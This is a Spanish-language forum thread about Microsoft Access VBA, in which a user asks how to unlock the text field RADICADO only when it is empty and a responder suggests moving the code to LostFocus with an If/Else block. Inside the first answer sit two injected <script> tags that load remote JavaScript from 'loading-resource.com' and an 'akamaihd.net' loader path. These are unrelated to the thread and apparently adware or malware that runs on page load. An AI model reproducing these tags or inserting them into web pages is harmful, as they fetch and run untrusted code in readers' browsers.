Bloquear campo vacío

Quiero bloquear un campo vacío por código pero por medio de una condición lo que pasa es que tengo errores este es mi código y lo explicare

Private Sub RADICADO GotFocus()
If RADICADO.Value = "" Then
RADICADO.Locked = False

End If
End Sub

Lo que pretendo con este código, es que si el campo de texto radicado, este vacío o este sin datos, entonces que se desbloquie o que locked quede en false, pero que si tiene datos pues que quede bloqueado, pero no se como.

1 respuesta

Respuesta

Lo primero para poder ayudarte es saber que tipo de datos tiene el control "radicado" (texto, numérico, fecha, etc.) Por lo que tu has puesto en el código eso se referiría a un control tipo texto.

Por otra parte creo que utilizas un evento equivocado: "GotFocus", se procude al recibir el enfoque en el control, por lo que por lógica siempre estará vacío. Pon lo mismo en el evento

"lostfocus", al perder el enfoque y mira a ver que sucede. Con las dudas comentas y no olvides visitar EL FORO

Un saludo.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

hola, gracias por responder te cuento, el campo radicado, para este ejemplo lo tengo en tipo texto, cambie al evento que me indicaste quedando el código así:

Private Sub RADICADO_LostFocus()
If RADICADO.Value = Null Then
RADICADO.Locked = False
End If
End Sub

El campo de texto lo configure para que estuviera bloqueado, y lo que pretendo es que si el campo esta vacío que me lo desbloquie para introducir un dato, pero que si tiene un dato el campo siga bloqueado, así como esta con el LostFocus, el me bloquea estando vacío o con valor el campo, no se como cambiar el código para que me permita lo que deseo, gracias

A ver si de esta manera:

Private Sub RADICADO_LostFocus()
If RADICADO = "" Then
RADICADO.Locked = False

else

RADICADO.Locked = True
End If
End Sub

Por otra parte si también quieres que este bloqueado cuando vas recorriendo los registros, coloca lo mismo en el evento del formulario " Al activar registro".